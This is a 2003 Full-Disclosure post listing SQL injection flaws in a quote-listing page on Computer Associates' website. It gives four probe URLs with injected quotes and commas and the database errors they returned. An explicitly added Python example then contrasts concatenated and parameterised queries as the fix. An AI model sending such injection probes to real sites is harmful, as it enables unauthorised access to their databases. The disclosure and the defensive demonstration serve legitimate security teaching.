From: Sir Mordred (mordred[at]s-mail.com)
To: full-disclosure[at]lists.netsys.com
Date: Wed, 07 May 2003 15:47:00 +0000
Subject: [Full-Disclosure] @(#)Mordred Labs security notice - exploring the security companies

// @(#)Mordred Labs security notice 0x0002

Name: Exploring the security companies (part one)
Release date: May 7, 2003
Author: Sir Mordred (mordred@s-mail.com)

I. INTRODUCTION

This is the first part of a security notice about security companies.
I'd split the original notice because of the amount of information contained
in it.
The main topic of this notice is "bad coding habits"; next time maybe we
will talk about security audit, and source code audit in particular.

Also, I should say - somehow I feel respect for people who are doing
security and are brave enough to build a website with dynamic content, not
just a couple of HTML pages. But sometimes a crazy thought crosses my mind -
maybe it is just a dumb honeypot? :-)

The format for vulnerabilities is:

number) [hostname, the company name]
quotes, comments (if exists)
* ISSUE (number) - description of the vulnerability
blank line
comments (if exists)
blank line
the url to demonstrate this vulnerability
blank line
the error message (if exists)

II. DETAILS

Now let's begin with the rather interesting security company "e-matters",
and a couple of minutes brings us several nice issues:


[snip...]


2) [ www.ca.com, Computer Associates ]
CA is a $3 billion revenue enterprise software company, providing business-critical technology that serves as the backbone of commerce and shapes the way business is conducted throughout the world.
* ISSUE 1 - SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1,'1&SOL=1&AR=&CP=

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ','.
/common/include/caADO.asp, line 243

* ISSUE 2 - Another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1,1&AR=&CP=

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near '1'.
/common/include/caADO.asp, line 243

* ISSUE 3 - Another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR=&CP=,'

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ','.
/common/include/caADO.asp, line 243

* ISSUE 4 - Yet another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR='88&CP=20099

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '88)) AND q.FKComp_ID = 20099 ORDER BY co.Comp_Name, Quotes_Date DESC'.
/common/include/caADO.asp, line 243
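The four CA errors above all come from the same "bad coding habit": request
parameters are pasted straight into the SQL text, so a stray quote or comma in
AR, AT, SOL or CP changes the statement instead of being treated as data (the
ISSUE 4 message even leaks the tail of the query). The following is an added
example, not code from the notice or from CA: it rebuilds that query shape
against an in-memory SQLite database (standing in for SQL Server) and runs the
concatenated version beside a parameterised one, so the server-side symptom and
the fix can both be seen offline. The table and column names other than the
leaked fragment (FKComp_ID, Comp_Name, Quotes_Date), and the sample rows, are
constructed for the example.

```python
"""Added example (not part of Mordred's notice): the SQL-injection class
behind the quotelist.asp errors, reproduced with the sqlite3 module.

Constructed assumptions (not taken from the page): tables `quotes` and
`companies`, columns Quote_ID/Area/Comp_ID, and the two sample rows.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the quotes database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE companies (Comp_ID INTEGER PRIMARY KEY, Comp_Name TEXT);
        CREATE TABLE quotes (
            Quote_ID INTEGER PRIMARY KEY,
            FKComp_ID INTEGER,
            Area TEXT,
            Quotes_Date TEXT
        );
        INSERT INTO companies VALUES (20099, 'Example Corp');
        INSERT INTO quotes VALUES (1, 20099, '88', '2003-05-01');
        INSERT INTO quotes VALUES (2, 20099, '42', '2003-04-01');
        """
    )
    return conn


def quotes_concat(conn, area: str, comp_id: str):
    """Vulnerable shape: request values concatenated into the SQL text.

    With area = "'88" the quote lands inside the literal, which is exactly
    the "Unclosed quotation mark" condition the page's ISSUE 4 reports.
    """
    sql = (
        "SELECT q.Quote_ID FROM quotes q "
        "JOIN companies co ON co.Comp_ID = q.FKComp_ID "
        "WHERE ((q.Area = '" + area + "')) AND q.FKComp_ID = " + comp_id
        + " ORDER BY co.Comp_Name, q.Quotes_Date DESC"
    )
    return [row[0] for row in conn.execute(sql)]


def quotes_param(conn, area: str, comp_id: str):
    """Hardened shape: same statement, values passed as bound parameters.

    The driver sends `area` as data, so a quote in it is compared literally
    and cannot alter the statement. comp_id is validated as an integer up
    front, which also rejects the comma probes seen in ISSUEs 1 to 3.
    """
    comp_id_int = int(comp_id)  # raises ValueError on "20099,1" and friends
    sql = (
        "SELECT q.Quote_ID FROM quotes q "
        "JOIN companies co ON co.Comp_ID = q.FKComp_ID "
        "WHERE ((q.Area = ?)) AND q.FKComp_ID = ? "
        "ORDER BY co.Comp_Name, q.Quotes_Date DESC"
    )
    return [row[0] for row in conn.execute(sql, (area, comp_id_int))]


def probe(area: str, comp_id: str) -> dict:
    """Run both versions on one input; report rows or the error class name.

    Returns {"concat": rows-or-exception-name, "param": rows-or-exception-name}.
    """
    conn = build_db()
    out = {}
    for name, fn in (("concat", quotes_concat), ("param", quotes_param)):
        try:
            out[name] = fn(conn, area, comp_id)
        except (sqlite3.Error, ValueError) as exc:
            out[name] = type(exc).__name__
    return out


if __name__ == "__main__":
    print("benign input:     ", probe("88", "20099"))
    print("quote in AR:      ", probe("'88", "20099"))
    print("comma in CP:      ", probe("88", "20099,1"))
```

On benign input both versions return the same row; on the quote or comma
inputs the concatenated version fails inside the database engine (the
condition that surfaces as the '80040e14' page on the live site), while the
parameterised version either returns no rows or rejects the value before any
SQL is sent. The error text a database returns is the detection signal here:
an application that shows it to the client is also confirming where the
untrusted input lands in the statement.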

